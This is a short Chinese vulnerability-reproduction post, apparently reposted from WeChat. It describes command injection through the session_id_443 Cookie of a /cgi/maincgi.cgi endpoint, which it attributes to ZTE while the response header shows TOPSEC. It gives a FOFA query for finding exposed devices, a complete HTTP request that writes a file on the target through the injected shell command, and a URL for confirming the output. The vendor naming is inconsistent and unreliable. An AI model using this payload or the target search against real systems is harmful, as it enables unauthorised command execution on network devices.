【漏洞复现】ZTE公司 产品 Cookie 远程命令执行漏洞
2024-1-4 19:44:39 Author: 法克安全(查看原文) 阅读量:22 收藏

使

01

漏洞名称

ZTE Cookie 远程命令执行漏洞

02


漏洞影响

天融信TOPSEC

ZTE 公司产品

03

FOFA搜索语句
title="Web User Login" && body="/cgi/maincgi.cgi?Url=VerifyCode"

漏洞复现

第一步,向目标发送如下数据包,生成一个字符串写入文件

GET /cgi/maincgi.cgi?Url=aa HTTP/1.1Host: x.x.x.xCookie: session_id_443=1|echo 'test' > /www/htdocs/site/image/test.txt;User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36

响应内容如下

HTTP/1.1 200 OKDate: Thu, 04 Jan 2024 10:44:22 GMTServer: TOPSECCache-Control: no-cachePragma: no-cacheSet-cookie: session_id_443=deleted; expires=Sat, 01 Jan 2011 00:00:00 GMT;path=/;Set-cookie: session_id_443=deleted; expires=Sat, 01 Jan 2011 00:00:00 GMT;path=/cgi/;Connection: closeContent-Type: text/html; charset=gb2312Content-Length: 122
<script>alert('操作超时');if(window.opener){window.opener.top.location='/';self.close();}else{top.location='/';}</script>

啊?TOPSEC?

第二步,访问回显文件

https://x.x.x.x/site/image/test.txt

漏洞复现成功


文章来源: http://mp.weixin.qq.com/s?__biz=MzkwMjIzNTU2Mg==&mid=2247484100&idx=1&sn=6e0d4401512bbb73cf029eb7a1502536&chksm=c11f99f047808d6561085adc09e1b69de6043a11a6618c3ea971a56746a51d0b5d560335a17b&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh